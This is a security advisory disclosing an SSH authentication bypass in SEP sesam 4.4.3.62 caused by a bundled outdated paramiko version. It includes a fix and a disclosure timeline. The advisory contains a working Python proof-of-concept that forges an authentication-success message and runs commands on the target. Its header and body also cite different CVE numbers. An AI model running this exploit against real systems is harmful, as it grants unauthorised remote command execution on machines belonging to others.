usd-2018-0025 | SEP sesam/4.4.3.62


Advisory ID: usd-2018-0025
CVE Number: CVE-2018-7750
Affected Product: SEP sesam
Affected Version: 4.4.3.62
Vulnerability Type: Authentication Bypass
Security Risk: High
Vendor URL: https://www.sep.de/
Vendor Status: Fixed

Description

SEP sesam uses an outdated version of paramiko (2.2.3) in sm_sshd, which has a known authentication bypass vulnerability (CVE-2018-1000805)

Proof of Concept (PoC)

Install the SEP sesam client. It opens an SSH server at port 11322. Run the following python script to exploit CVE-2018-1000805. 

#!/usr/bin/env python
from paramiko.common import cMSG_USERAUTH_SUCCESS, cMSG_USERAUTH_INFO_RESPONSE
import paramiko

port = 11322
hostname = ‘[IP of client machine]’
username = ”
password = ”

client = paramiko.SSHClient()

#enable warning policy to allow connections to all servers
client.set_missing_host_key_policy(paramiko.WarningPolicy())

#overwrite auth method to skip the auth process
client._auth = lambda *args, **kwargs: None
client.connect(hostname, port, username, password)

#craft MSG_USERAUTH_SUCCESS message
m = paramiko.Message()
m.add_byte(cMSG_USERAUTH_SUCCESS)
client._transport._send_message(m)

stdin, stdout, stderr = client.exec_command(‘whoami’)
print stdout.read()

client.close()

Fix

Update paramiko to version 2.2.4

Timeline

  • 2018-09-11 notify info@sep.de
  • 2018-10-08 notify support@sep.de
  • 2018-12-07 verified that sesam 4.4.3-64 uses Paramiko 2.2.4
  • 2018-12-07 Security advisory released

Credits

This security vulnerabilities were found by Daniel Hoffmann and Konstantin Samuel of usd AG.